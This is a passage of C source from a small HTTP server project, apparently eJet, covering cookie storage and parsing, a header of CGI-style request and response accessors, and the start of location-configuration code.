frame_appendf(frm, " createtime=%lu", ckie->createtime);
fprintf(fp, "%s\n", frameS(frm));
}
}
}
LeaveCriticalSection(&mgmt->cookieCS);
frame_free(frm);
fclose(fp);
return 0;
}
int cookie_mgmt_scan (void * vmgmt)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
HTTPMgmt * httpmgmt = NULL;
cookie_path_t * ckpath = NULL;
cookie_t * ckie = NULL;
int rmnum = 0;
int i, num;
time_t curt = 0;
if (!mgmt) return -1;
httpmgmt = (HTTPMgmt *)mgmt->httpmgmt;
if (!httpmgmt) return -2;
curt = time(0);
EnterCriticalSection(&mgmt->cookieCS);
num = arr_num(mgmt->cookie_list);
for (i = 0; i < num; i++) {
ckie = arr_value(mgmt->cookie_list, i);
if (!ckie) continue;
if ((ckie->expire > 0 && ckie->expire < curt) ||
(ckie->maxage > 0 && ckie->createtime + ckie->maxage < curt)
) {
arr_delete(mgmt->cookie_list, i); i--; num--;
ckpath = ckie->ckpath;
if (ckpath)
arr_delete_ptr(ckpath->cookie_list, ckie);
http_cookie_free(ckie);
rmnum++;
}
}
LeaveCriticalSection(&mgmt->cookieCS);
if (rmnum > 0) {
cookie_mgmt_write(mgmt, mgmt->cookie_file);
}
if (arr_num(mgmt->cookie_list) > 0)
mgmt->scan_timer = iotimer_start(httpmgmt->pcore,
10*60*1000,
t_http_cookie_scan,
NULL,
cookie_callback, mgmt);
return rmnum;
}
int cookie_mgmt_add (void * vmgmt, void * vckie)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
HTTPMgmt * httpmgmt = NULL;
cookie_t * ckie = (cookie_t *)vckie;
cookie_domain_t * ckdomain = NULL;
cookie_path_t * ckpath = NULL;
cookie_t * iter = NULL;
int i, num;
if (!mgmt) return -1;
if (!ckie) return -2;
httpmgmt = (HTTPMgmt *)mgmt->httpmgmt;
if (!httpmgmt) return -3;
EnterCriticalSection(&mgmt->cookieCS);
/* get the domain object, if not existing, create it */
ckdomain = cookie_mgmt_domain_get(mgmt, ckie->domain, ckie->domainlen);
if (!ckdomain) {
ckdomain = cookie_domain_alloc();
if (!ckdomain) {
LeaveCriticalSection(&mgmt->cookieCS);
return -100;
}
str_secpy(ckdomain->domain, sizeof(ckdomain->domain)-1, ckie->domain, ckie->domainlen);
actrie_add(mgmt->domain_trie, ckie->domain, ckie->domainlen, ckdomain);
cookie_mgmt_domain_set(mgmt, ckie->domain, ckie->domainlen, ckdomain);
}
/* get the path object of the domain, if not existing, create it */
ckpath = cookie_domain_path_get(ckdomain, ckie->path, ckie->pathlen);
if (!ckpath) {
ckpath = cookie_path_alloc();
if (!ckdomain) {
LeaveCriticalSection(&mgmt->cookieCS);
return -200;
}
str_secpy(ckpath->path, sizeof(ckpath->path)-1, ckie->path, ckie->pathlen);
actrie_add(ckdomain->cookie_path_trie, ckie->path, ckie->pathlen, ckpath);
arr_push(ckdomain->cookie_path_list, ckpath);
}
/* iterate the cookie list to find an existing one */
num = arr_num(ckpath->cookie_list);
for (i = 0; i < num; i++) {
iter = arr_value(ckpath->cookie_list, i);
if (!iter) continue;
if (iter->namelen != ckie->namelen) continue;
if (strncasecmp(iter->name, ckie->name, iter->namelen) == 0) {
if (iter->valuelen != ckie->valuelen ||
strncasecmp(iter->value, ckie->value, iter->valuelen) != 0) {
if (iter->value) kfree(iter->value);
iter->value = str_dup(ckie->value, ckie->valuelen);
iter->valuelen = ckie->valuelen;
}
iter->expire = ckie->expire;
iter->maxage = ckie->maxage;
iter->httponly = ckie->httponly;
iter->secure = ckie->secure;
iter->samesite = ckie->samesite;
iter->createtime = ckie->createtime;
iter->ckpath = ckpath;
LeaveCriticalSection(&mgmt->cookieCS);
return 0;
}
}
/* not found an existing cookie object in ckpath object */
arr_push(ckpath->cookie_list, ckie);
ckie->ckpath = ckpath;
arr_push(mgmt->cookie_list, ckie);
LeaveCriticalSection(&mgmt->cookieCS);
if (mgmt->scan_timer == NULL)
mgmt->scan_timer = iotimer_start(httpmgmt->pcore,
10*60*1000,
t_http_cookie_scan,
NULL,
cookie_callback, mgmt);
return 1;
}
void * cookie_mgmt_get (void * vmgmt, char * domain, int domainlen,
char * path, int pathlen, char * ckname, int cklen)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
cookie_domain_t * ckdomain = NULL;
cookie_path_t * ckpath = NULL;
cookie_t * iter = NULL;
int i, num;
int ret = 0;
if (!mgmt) return NULL;
if (!domain) return NULL;
if (domainlen < 0) domainlen = strlen(domain);
if (domainlen <= 0) return NULL;
if (!path) return NULL;
if (pathlen < 0) pathlen = strlen(path);
if (pathlen <= 0) return NULL;
if (!ckname) return NULL;
if (cklen < 0) cklen = strlen(ckname);
if (cklen <= 0) return NULL;
EnterCriticalSection(&mgmt->cookieCS);
ret = actrie_get(mgmt->domain_trie, domain, domainlen, (void **)&ckdomain);
if (ret <= 0 || !ckdomain) {
LeaveCriticalSection(&mgmt->cookieCS);
return NULL;
}
ret = actrie_get(ckdomain->cookie_path_trie, path, pathlen, (void **)&ckpath);
if (ret <= 0 || !ckpath) {
LeaveCriticalSection(&mgmt->cookieCS);
return NULL;
}
/* iterate the cookie list to find an existing one */
num = arr_num(ckpath->cookie_list);
for (i = 0; i < num; i++) {
iter = arr_value(ckpath->cookie_list, i);
if (!iter) continue;
if (iter->namelen != cklen) continue;
if (strncasecmp(iter->name, ckname, cklen) == 0) {
LeaveCriticalSection(&mgmt->cookieCS);
return iter;
}
}
LeaveCriticalSection(&mgmt->cookieCS);
return NULL;
}
int cookie_mgmt_mget (void * vmgmt, char * domain, int domainlen, char * path, int pathlen, arr_t ** cklist)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
cookie_domain_t * ckdomain = NULL;
cookie_path_t * ckpath = NULL;
int ret = 0;
if (!mgmt) return -1;
if (!domain) return -2;
if (domainlen < 0) domainlen = strlen(domain);
if (domainlen <= 0) return -3;
if (!path) return -4;
if (pathlen < 0) pathlen = strlen(path);
if (pathlen <= 0) return -5;
EnterCriticalSection(&mgmt->cookieCS);
ret = actrie_get(mgmt->domain_trie, domain, domainlen, (void **)&ckdomain);
if (ret <= 0 || !ckdomain) {
LeaveCriticalSection(&mgmt->cookieCS);
return -100;
}
ret = actrie_get(ckdomain->cookie_path_trie, path, pathlen, (void **)&ckpath);
if (ret <= 0 || !ckpath) {
LeaveCriticalSection(&mgmt->cookieCS);
return -200;
}
if (cklist) *cklist = ckpath->cookie_list;
ret = arr_num(ckpath->cookie_list);
LeaveCriticalSection(&mgmt->cookieCS);
return ret;
}
int cookie_mgmt_set (void * vmgmt, char * ckname, int cknlen, char * ckvalue, int ckvlen,
char * domain, int domainlen, char * path, int pathlen, time_t expire,
int maxage, uint8 httponly, uint8 secure, uint8 samesite)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
cookie_t * ckie = NULL;
if (!mgmt) return -1;
if (!ckname) return -2;
if (cknlen < 0) cknlen = strlen(ckname);
if (cknlen <= 0) return -3;
if (!ckvalue) return -2;
if (ckvlen < 0) ckvlen = strlen(ckvalue);
if (ckvlen <= 0) return -3;
if (!domain) return -2;
if (domainlen < 0) domainlen = strlen(domain);
if (domainlen <= 0) return -3;
if (!path) return -2;
if (pathlen < 0) pathlen = strlen(path);
if (pathlen <= 0) return -3;
ckie = http_cookie_alloc();
if (!ckie) return -100;
ckie->name = ckname;
ckie->namelen = cknlen;
ckie->value = ckvalue;
ckie->valuelen = ckvlen;
ckie->domain = domain;
ckie->domainlen = domainlen;
ckie->path = path;
ckie->pathlen = pathlen;
ckie->expire = expire;
ckie->maxage = maxage;
ckie->httponly = httponly;
ckie->secure = secure;
ckie->samesite = samesite;
if (cookie_mgmt_add(mgmt, ckie) <= 0)
http_cookie_free(ckie);
return 0;
}
int cookie_mgmt_parse (void * vmgmt, char * pbyte, int bytelen, char * defdom, int defdomlen)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
cookie_t * ckie = NULL;
arr_t * cklist = NULL;
char * domain = NULL;
int domainlen = 0;
char * path = NULL;
int pathlen = 0;
time_t expire = 0;
int maxage = 0;
uint8 httponly = 0;
uint8 secure = 0;
uint8 samesite = 0;
time_t createtime = 0;
char * plist[32];
int plen[32];
char * key;
int keylen;
char * data;
int datalen;
char * p;
char * pend;
int i, num;
char * pkv[2];
int kvlen[2];
int ret;
if (!mgmt) return -1;
if (!pbyte) return -2;
if (bytelen < 0) bytelen = strlen(pbyte);
if (bytelen <= 0) return -3;
num = string_tokenize(pbyte, bytelen, ";", 1, (void **)plist, plen, 32);
if (num <= 0) return -100;
cklist = arr_new(4);
for (i = 0; i < num; i++) {
pend = plist[i] + plen[i];
p = skipOver(plist[i], plen[i], " \t\r\n;", 5);
if (p >= pend) continue;
ret = string_tokenize(p, pend-p, "=", 1, (void **)pkv, kvlen, 2);
if (ret <= 0) continue;
key = pkv[0]; pend = key + kvlen[0];
p = rskipOver(pend-1, pend-key, " \t\r\n=;", 6);
if (p < key) continue;
keylen = p - key + 1;
if (ret < 2) {
data = NULL;
datalen = 0;
} else {
data = pkv[1]; pend = data + kvlen[1];
p = rskipOver(pend-1, pend-data, " \t\r\n;=", 6);
if (p < data) datalen = 0;
else datalen = p - data + 1;
}
if (keylen == 4 && strncasecmp(key, "path", 4) == 0) {
path = data; pathlen = datalen;
} else if (keylen == 6 && strncasecmp(key, "domain", 6) == 0) {
pend = data + datalen;
data = skipOver(data, pend-data, " .\t", 3);
domain = data; domainlen = pend-data;
} else if (keylen == 7 && strncasecmp(key, "expires", 7) == 0) {
str_gmt2time(data, datalen, &expire);
} else if (keylen == 7 && strncasecmp(key, "max-age", 7) == 0) {
maxage = str_to_int(data, datalen, 10, NULL);
} else if (keylen == 8 && strncasecmp(key, "samesite", 8) == 0) {
if (datalen == 6 && strncasecmp(data, "Strict", 6) == 0)
samesite = 1;
else if (datalen == 3 && strncasecmp(data, "Lax", 3) == 0)
samesite = 2;
else
samesite = 0;
} else if (keylen == 6 && strncasecmp(key, "secure", 6) == 0) {
if (data == NULL || datalen <= 0)
secure = 1;
} else if (keylen == 8 && strncasecmp(key, "httponly", 8) == 0) {
if (data == NULL || datalen <= 0)
httponly = 1;
} else if (keylen == 10 && strncasecmp(key, "createtime", 10) == 0) {
if (data && datalen > 0)
createtime = strtoull(data, NULL, 10);
} else {
ckie = http_cookie_alloc();
ckie->name = str_dup(key, keylen);
ckie->namelen = keylen;
ckie->value = str_dup(data, datalen);
ckie->valuelen = datalen;
arr_push(cklist, ckie);
}
}
if (!domain || domainlen <= 0) {
domain = defdom;
domainlen = defdomlen;
}
num = arr_num(cklist);
for (i = 0; i < num; i++) {
ckie = arr_value(cklist, i);
if (!ckie) continue;
ckie->path = str_dup(path, pathlen);
ckie->pathlen = pathlen;
ckie->domain = str_dup(domain, domainlen);
ckie->domainlen = domainlen;
ckie->expire = expire;
ckie->maxage = maxage;
ckie->secure = secure;
ckie->httponly = httponly;
ckie->samesite = samesite;
if (createtime > 0)
ckie->createtime = createtime;
if (cookie_mgmt_add(mgmt, ckie) <= 0) {
tolog(1, "eJet - Update Cookie: %s=%s; path=%s; domain=%s; expire=%ld; maxage=%d%s%s%s\n",
ckie->name, ckie->value, ckie->path, ckie->domain, ckie->expire, ckie->maxage,
ckie->secure > 0 ? "; Secure" : "",
ckie->httponly > 0 ? "; HTTPOnly" : "",
ckie->samesite == 1 ? "; Strict" : (ckie->samesite == 2 ? "; Lax" : ""));
http_cookie_free(ckie);
} else {
tolog(1, "eJet - New Cookie: %s=%s; path=%s; domain=%s; expire=%ld; maxage=%d%s%s%s\n",
ckie->name, ckie->value, ckie->path, ckie->domain, ckie->expire, ckie->maxage,
ckie->secure > 0 ? "; Secure" : "",
ckie->httponly > 0 ? "; HTTPOnly" : "",
ckie->samesite == 1 ? "; Strict" : (ckie->samesite == 2 ? "; Lax" : ""));
}
}
arr_free(cklist);
if (num > 0)
cookie_mgmt_write(mgmt, mgmt->cookie_file);
return 0;
}
int cookie_callback (void * vmgmt, void * vobj, int event, int fdtype)
{
CookieMgmt * mgmt = (CookieMgmt *)vmgmt;
int cmd;
if (!mgmt) return -1;
switch (event) {
case IOE_TIMEOUT:
cmd = iotimer_cmdid(vobj);
if (cmd == t_http_cookie_scan) {
mgmt->scan_timer = NULL;
return cookie_mgmt_scan(mgmt);
}
break;
}
return -1;
}
int http_cookie_add (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * httpmgmt = NULL;
CookieMgmt * ckiemgmt = NULL;
cookie_t * ckie = NULL;
arr_t * cklist = NULL;
HeaderUnit * unit = NULL;
frame_t * frm = NULL;
int ret = 0;
int i, num;
if (!msg) return -1;
httpmgmt = (HTTPMgmt *)msg->httpmgmt;
if (!httpmgmt) return -2;
ckiemgmt = (CookieMgmt *)httpmgmt->cookiemgmt;
if (!ckiemgmt) return -3;
ret = cookie_mgmt_mget(ckiemgmt, msg->req_host, msg->req_hostlen,
msg->req_path, msg->req_pathlen, &cklist);
if (ret <= 0 || !cklist) return -100;
frm = frame_new(4096);
unit = http_header_get(msg, 0, "Cookie", -1);
if (unit && unit->valuelen > 0) {
frame_put_nfirst(frm, HUValue(unit), unit->valuelen);
}
num = arr_num(cklist);
for (i = 0, ret = 0; i < num; i++) {
ckie = arr_value(cklist, i);
if (!ckie) continue;
frame_appendf(frm, "%s%s=%s", frameL(frm) > 0 ? "; " : "", ckie->name, ckie->value);
ret++;
}
if (ret > 0) {
http_header_del(msg, 0, "Cookie", -1);
http_header_append(msg, 0, "Cookie", -1, frameP(frm), frameL(frm));
}
frame_free(frm);
return 0;
}
int http_set_cookie_parse (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * httpmgmt = NULL;
CookieMgmt * ckiemgmt = NULL;
HeaderUnit * unit = NULL;
int ret = 0;
if (!msg) return -1;
httpmgmt = (HTTPMgmt *)msg->httpmgmt;
if (!httpmgmt) return -2;
ckiemgmt = (CookieMgmt *)httpmgmt->cookiemgmt;
if (!ckiemgmt) return -3;
unit = http_header_get(msg, 1, "Set-Cookie", -1);
while (unit && unit->valuelen > 0) {
ret = cookie_mgmt_parse(ckiemgmt, HUValue(unit), unit->valuelen, msg->req_host, msg->req_hostlen);
unit = unit->next;
}
return ret;
}
<|start_filename|>include/http_cgi.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_CGI_H_
#define _HTTP_CGI_H_
#ifdef __cplusplus
extern "C" {
#endif
void * GetHTTPMgmt (void * vmsg);
void * GetEPump (void * vmsg);
void * GetIODev (void * vmsg);
frame_p GetFrame (void * vmsg);
int RecycleFrame (void * vmsg, frame_p frame);
char * GetRootPath (void * vmsg);
int GetPathP (void * vmsg, char ** ppath, int * pathlen);
int GetReqPath (void * vmsg, char * path, int pathlen);
int GetRealPath (void * vmsg, char * path, int pathlen);
int GetRealFile (void * vmsg, char * path, int pathlen);
int GetLocFile (void * vmsg, char * p, int len, char * f, int flen, char * d, int dlen);
int GetPathOnly (void * vmsg, char * path, int pathlen);
int GetFileOnly (void * vmsg, char * path, int pathlen);
int GetFileExt (void * vmsg, char * path, int pathlen);
int GetMethodInd (void * vmsg);
char * GetMethod (void * vmsg);
int GetBaseURL (void * vmsg, char ** pbase, int * plen);
char * GetAbsURL (void * vmsg);
char * GetRelative (void * vmsg);
char * GetURL (void * vmsg);
char * GetDocURL (void * vmsg);
int GetSchemeP (void * vmsg, char ** pscheme, int * schemelen);
int GetScheme (void * vmsg, char * scheme, int schemelen);
int GetHostP (void * vmsg, char ** phost, int * hostlen);
int GetHost (void * vmsg, char * host, int hostlen);
int GetPort (void * vmsg);
int GetQueryP (void * vmsg, char ** pquery, int * pquerylen);
int GetQuery (void * vmsg, char * query, int querylen);
int GetQueryValueP (void * vmsg, char * key, char ** pval, int * vallen);
int GetQueryValue (void * vmsg, char * key, char * val, int vallen);
int GetQueryUint (void * vmsg, char * key, uint32 * val);
int GetQueryInt (void * vmsg, char * key, int * val);
int GetQueryUlong (void * vmsg, char * key, ulong * val);
int GetQueryInt64 (void * vmsg, char * key, int64 * val);
int GetQueryUint64 (void * vmsg, char * key, uint64 * val);
int GetQueryLong (void * vmsg, char * key, long * val);
int GetQueryKeyExist (void * vmsg, char * key);
int GetReqContent (void * vmsg, void * body, int bodylen);
int GetReqContentP (void * vmsg, void ** pbody, int * bodylen);
int GetReqFormJsonValueP (void * vmsg, char * key, char ** ppval, int * vallen);
int GetReqFormJsonValue (void * vmsg, char * key, char * pval, int vallen);
int GetReqFormJsonKeyExist (void * vmsg, char * key);
int GetReqFormDecodeValueP (void * vmsg, char * key, char ** ppval, int * vallen);
int GetReqFormDecodeValue (void * vmsg, char * key, char * pval, int vallen);
int GetReqFormValueP (void * vmsg, char * key, char ** ppval, int * vallen);
int GetReqFormValue (void * vmsg, char * key, char * pval, int vallen);
int GetReqFormUint (void * vmsg, char * key, uint32 * val);
int GetReqFormInt (void * vmsg, char * key, int * val);
int GetReqFormUlong (void * vmsg, char * key, ulong * val);
int GetReqFormLong (void * vmsg, char * key, long * val);
int GetReqFormUint64 (void * vmsg, char * key, uint64 * val);
int GetReqFormKeyExist (void * vmsg, char * key);
int GetReqHdrNum (void * vmsg);
int GetReqHdrIndP (void * vmsg, int index, char ** pname, int * namelen,
char ** pvalue, int * valuelen);
int GetReqHdrInd (void * vmsg, int index, char * name, int namelen,
char * value, int valuelen);
int GetReqHdr (void * vmsg, char * name, int namelen, char * value, int valuelen);
int GetReqHdrP (void * vmsg, char * name, int namelen, char ** pval, int * vallen);
int GetReqHdrInt (void * vmsg, char * name, int namelen);
long GetReqHdrLong (void * vmsg, char * name, int namelen);
ulong GetReqHdrUlong (void * vmsg, char * name, int namelen);
int64 GetReqHdrInt64 (void * vmsg, char * name, int namelen);
uint64 GetReqHdrUint64 (void * vmsg, char * name, int namelen);
int GetReqContentTypeP (void * vmsg, char ** ptype, int * typelen);
int GetReqContentType (void * vmsg, char * type, int typelen);
int GetReqContentLength (void * vmsg);
int GetReqEtag (void * vmsg, char * etag, int etaglen);
int GetCookieP (void * vmsg, char * name, int nlen, char ** pv, int * vlen);
int GetCookie (void * vmsg, char * name, int nlen, char * val, int vlen);
int AddReqHdr (void * vmsg, char * name, int namelen, char * value, int valuelen);
int AddReqHdrInt (void * vmsg, char * name, int namelen, int value);
int AddReqHdrUint32 (void * vmsg, char * name, int namelen, uint32 value);
int AddReqHdrLong (void * vmsg, char * name, int namelen, long value);
int AddReqHdrUlong (void * vmsg, char * name, int namelen, ulong value);
int AddReqHdrInt64 (void * vmsg, char * name, int namelen, int64 value);
int AddReqHdrUint64 (void * vmsg, char * name, int namelen, uint64 value);
int AddReqHdrDate (void * vmsg, char * name, int namelen, time_t dtime);
int DelReqHdr (void * vmsg, char * name, int namelen);
int SetResEtag (void * vmsg, char * etag, int etaglen);
int SetCookie (void * vmsg, char * name, char * value, time_t expire,
char * path, char * domain, uint8 secure);
int SetReqContentType (void * vmsg, char * type, int typelen);
int SetReqContentLength (void * vmsg, int64 len);
int SetReqContent (void * vmsg, void * body, int bodylen);
int SetReqFileContent (void * vmsg, char * filename);
int AddReqContent (void * vmsg, void * body, int64 bodylen);
int AddReqContentPtr (void * vmsg, void * body, int64 bodylen);
int AddReqFile (void * vmsg, char * filename, int64 startpos, int64 len);
int AddReqAppCBContent (void * vmsg, void * fetchfunc, void * fetchobj, int64 offset, int64 length,
void * movefunc, void * movepara, void * endfetch, void * endobj);
int GetResHdrNum (void * vmsg);
int GetResHdrIndP (void * vmsg, int index, char ** pname, int * namelen,
char ** pvalue, int * valuelen);
int GetResHdrInd (void * vmsg, int index, char * name, int namelen,
char * value, int valuelen);
int GetResHdr (void * vmsg, char * name, int namelen, char * value, int valuelen);
int GetResHdrP (void * vmsg, char * name, int namelen, char ** pval, int * vallen);
int GetResHdrInt (void * vmsg, char * name, int namelen);
long GetResHdrLong (void * vmsg, char * name, int namelen);
ulong GetResHdrUlong (void * vmsg, char * name, int namelen);
int64 GetResHdrInt64 (void * vmsg, char * name, int namelen);
uint64 GetResHdrUint64 (void * vmsg, char * name, int namelen);
int GetResContentTypeP (void * vmsg, char ** ptype, int * typelen);
int GetResContentType (void * vmsg, char * type, int typelen);
int GetResContentTypeID (void * vmsg, uint32 * mimeid, char ** pext);
int64 GetResContentLength (void * vmsg);
int GetResContent (void * vmsg, void * body, int bodylen);
int GetResContentP (void * vmsg, int64 pos, void ** pbody, int64 * bodylen);
int GetStatus (void * vmsg, char * reason, int * reasonlen);
int SetStatus (void * vmsg, int code, char * reason);
int AddResHdr (void * vmsg, char * name, int namelen, char * value, int valuelen);
int AddResHdrInt (void * vmsg, char * name, int namelen, int value);
int AddResHdrUint32 (void * vmsg, char * name, int namelen, uint32 value);
int AddResHdrLong (void * vmsg, char * name, int namelen, long value);
int AddResHdrUlong (void * vmsg, char * name, int namelen, ulong value);
int AddResHdrInt64 (void * vmsg, char * name, int namelen, int64 value);
int AddResHdrUint64 (void * vmsg, char * name, int namelen, uint64 value);
int AddResHdrDate (void * vmsg, char * name, int namelen, time_t dtime);
int DelResHdr (void * vmsg, char * name, int namelen);
int Check304Resp (void * vmsg, uint64 mediasize, time_t mtime, uint32 inode);
int SetResContentType (void * vmsg, char * type, int typelen);
int SetResContentTypeID (void * vmsg, uint32 mimeid);
int SetResContentLength (void * vmsg, int64 len);
int AddResContent (void * vmsg, void * body, int64 bodylen);
int AddResStripContent (void * vmsg, void * body, int64 bodylen, char * escch, int chlen);
int AddResContentPtr (void * vmsg, void * body, int64 bodylen);
int AddResFile (void * vmsg, char * filename, int64 startpos, int64 len);
int AddResAppCBContent (void * vmsg, void * fetchfunc, void * fetchobj, int64 offset, int64 length,
void * movefunc, void * movepara, void * endfetch, void * endobj);
int AsynReply (void * vmsg, int bodyend, int probewrite);
int Reply (void * vmsg);
int ReplyFeeding (void * vmsg);
int ReplyFeedingEnd (void * vmsg);
int RedirectReply (void * vmsg, int status, char * url);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_listen.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifdef UNIX
#include <dlfcn.h>
#include <regex.h>
#endif
#if defined(_WIN32) || defined(_WIN64)
#define PCRE_STATIC 1
#include "pcre.h"
#endif
#include "adifall.ext"
#include "epump.h"
#include "http_listen.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_ssl.h"
#include "http_pump.h"
#include "http_variable.h"
#include "http_script.h"
#include "http_pagetpl.h"
void * http_loc_alloc (char * path, int pathlen, uint8 pathdup, int matchtype, int servtype, char * root)
{
HTTPLoc * ploc = NULL;
char * ptmp = NULL;
if (!path) return NULL;
if (pathlen < 0) pathlen = strlen(path);
if (pathlen <= 0) return NULL;
if (servtype == SERV_SERVER || servtype == SERV_UPLOAD) { //file or upload
/* check if the root path exists */
if (!root) return NULL;
}
ploc = kzalloc(sizeof(*ploc));
if (!ploc) return NULL;
if (pathdup) {
ploc->path = str_dup(path, pathlen);
ploc->path_dup = 1;
} else {
ploc->path = path;
ploc->path_dup = 0;
}
ploc->matchtype = matchtype;
ploc->type = servtype;
//if (!root) root = ".";
if (root && strlen(root) > 0 && (ptmp = realpath(root, NULL))) {
str_secpy(ploc->root, sizeof(ploc->root)-1, ptmp, strlen(ptmp));
free(ptmp);
if (ploc->root[strlen(ploc->root) - 1] == '/')
ploc->root[strlen(ploc->root) - 1] = '\0';
/*if (!file_is_dir(ploc->root)) {
file_dir_create(ploc->root, 0);
}*/
}
ploc->script_list = arr_new(2);
ploc->reply_script_list = arr_new(2);
return ploc;
}
void http_loc_free (void * vloc)
{
HTTPLoc * ploc = (HTTPLoc *)vloc;
if (!ploc) return;
if (ploc->path_dup) kfree(ploc->path);
arr_pop_kfree(ploc->reply_script_list);
arr_pop_kfree(ploc->script_list);
kfree(ploc);
}
int http_loc_set_root (void * vloc, char * root, int rootlen)
{
HTTPLoc * ploc = (HTTPLoc *)vloc;
if (!ploc) return -1;
return str_secpy(ploc->root, sizeof(ploc->root) - 1, root, rootlen);
}
int http_loc_set_index (void * vloc, char ** indexlist, int num)
{
HTTPLoc * ploc = (HTTPLoc *)vloc;
int i;
if (!ploc) return -1;
if (!indexlist || num <= 0) return -2;
ploc->indexnum = num;
for (i = 0; i < num; i++) {
ploc->index[i] = indexlist[i];
}
return num;
}
int http_loc_set_proxy (void * vloc, char * passurl, char * cachefile)
{
HTTPLoc * ploc = (HTTPLoc *)vloc;
if (!ploc) return -1;
if (!passurl) return -2;
ploc->type = SERV_PROXY;
ploc->passurl = passurl;
if (cachefile) {
ploc->cache = 1;
ploc->cachefile = cachefile;
}
return 0;
}
int http_loc_set_fastcgi (void * vloc, char * passurl)
{
HTTPLoc * ploc = (HTTPLoc *)vloc;
if (!ploc) return -1;
if (!passurl) return -2;
ploc->type = SERV_FASTCGI;
ploc->passurl = passurl;
return 0;
}
int http_loc_cmp_path (void * vloc, void * vpath)
{
HTTPLoc * ploc = (HTTPLoc *)vloc;
char * path = (char *)vpath;
if (!ploc) return -1;
if (!path) return 1;
return strcasecmp(ploc->path, path);
}
int http_loc_build (void * vhost, void * jhost)
{
HTTPHost * host = (HTTPHost *)vhost;
HTTPLoc * ploc = NULL;
HTTPLoc * ptmp = NULL;
#ifdef UNIX
regex_t * preg = NULL;
#endif
#if defined(_WIN32) || defined(_WIN64)
char * errstr = NULL;
int erroff = 0;
pcre * preg = NULL;
#endif
int i, locnum;
int ret = 0, subret = 0;
int j = 0;
char key[128];
char * value = NULL;
int valuelen = 0;
void * jloc = NULL;
char * path = NULL;
int matchtype = MATCH_DEFAULT;
int type = 0;
char * root = NULL;
if (!host) return -1;
if (!jhost) return -2;
sprintf(key, "location");
ret = json_mget_obj(jhost, key, -1, &jloc);
if (ret <= 0) {
/* here one default HTTPLoc should be created and appended */
tolog(1, "eJet - HTTPHost <%s> has no <Location> configure option!\n", host->hostname);
return -100;
}
for (locnum = ret, i = 1; i <= locnum && jloc != NULL; i++) {
path = NULL;
matchtype = MATCH_DEFAULT;
type = 0;
root = NULL;
ret = json_mgetP(jloc, "path", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
path = value;
if (ret > 1) {
ret = json_mgetP(jloc, "path[1]", -1, (void **)&value, &valuelen);
if (value && valuelen > 0) {
if (strcmp(value, "=") == 0)
matchtype = MATCH_EXACT; //1, exact matching
else if (strcmp(value, "^~") == 0)
matchtype = MATCH_PREFIX; //2, prefix matching
else if (strcmp(value, "~") == 0)
matchtype = MATCH_REGEX_CASE; //3, regex matching with case censitive
else if (strcmp(value, "~*") == 0)
matchtype = MATCH_REGEX_NOCASE; //4, regex matching ignoring case
} else {
matchtype = MATCH_PREFIX; //2, prefix matching
}
} else {
matchtype = MATCH_PREFIX; //2, prefix matching
}
if (strcmp(path, "/") == 0)
matchtype = MATCH_DEFAULT; //0, default
} else {
matchtype = MATCH_DEFAULT; //0, as default when path member not exist
}
ret = json_mgetP(jloc, "type", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
if (strcasecmp(value, "server") == 0)
type = SERV_SERVER;
else if (strcasecmp(value, "upload") == 0)
type = SERV_UPLOAD;
else if (strcasecmp(value, "proxy") == 0)
type = SERV_PROXY;
else if (strcasecmp(value, "fastcgi") == 0)
type = SERV_FASTCGI;
}
ret = json_mgetP(jloc, "root", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
root = value;
} else {
root = host->root;
}
ploc = http_loc_alloc(path, -1, 0, matchtype, type, root);
if (!ploc) goto nextloc;
ploc->jsonobj = jloc;
ploc->matchtype = matchtype;
if (ploc->type & SERV_UPLOAD) {//upload
if (host->uploadloc)
http_loc_free(host->uploadloc);
host->uploadloc = ploc;
} else {
EnterCriticalSection(&host->hostCS);
switch (ploc->matchtype) {
case MATCH_DEFAULT: //default loc
if (ploc->type & SERV_PROXY || ploc->type & SERV_FASTCGI) { //proxy or fastcgi
ploc->matchtype = MATCH_PREFIX; //prefix matching
arr_push(host->prefix_loc_list, ploc);
actrie_add(host->prefix_actrie, ploc->path, -1, ploc);
break;
}
if (host->defaultloc)
http_loc_free(host->defaultloc);
host->defaultloc = ploc;
break;
case MATCH_EXACT: //exact matching
ptmp = ht_delete(host->exact_loc_table, ploc->path);
if (ptmp) {
http_loc_free(ptmp);
}
ht_set(host->exact_loc_table, ploc->path, ploc);
break;
case MATCH_PREFIX: //prefix matching
arr_push(host->prefix_loc_list, ploc);
actrie_add(host->prefix_actrie, ploc->path, -1, ploc);
break;
case MATCH_REGEX_CASE: //regex matching with case censitive
case MATCH_REGEX_NOCASE: //regex matching ignoring case
arr_push(host->regex_loc_list, ploc);
#ifdef UNIX
preg = kzalloc(sizeof(regex_t));
if (ploc->matchtype == MATCH_REGEX_CASE) { //case censitive
regcomp(preg, ploc->path, REG_EXTENDED);
} else { //ignoring case
regcomp(preg, ploc->path, REG_EXTENDED | REG_ICASE);
}
#endif
#if defined(_WIN32) || defined(_WIN64)
if (ploc->matchtype == MATCH_REGEX_CASE) { //case censitive
preg = pcre_compile(ploc->path, 0, &errstr, &erroff, NULL);
} else { //ignoring case
preg = pcre_compile(ploc->path, PCRE_CASELESS, &errstr, &erroff, NULL);
}
#endif
arr_push(host->regex_list, preg);
break;
}
LeaveCriticalSection(&host->hostCS);
}
ret = json_mgetP(jloc, "index", -1, (void **)&value, &valuelen);
if (ret > 0 && value && valuelen > 0) {
ploc->indexnum = ret;
ploc->index[0] = value;
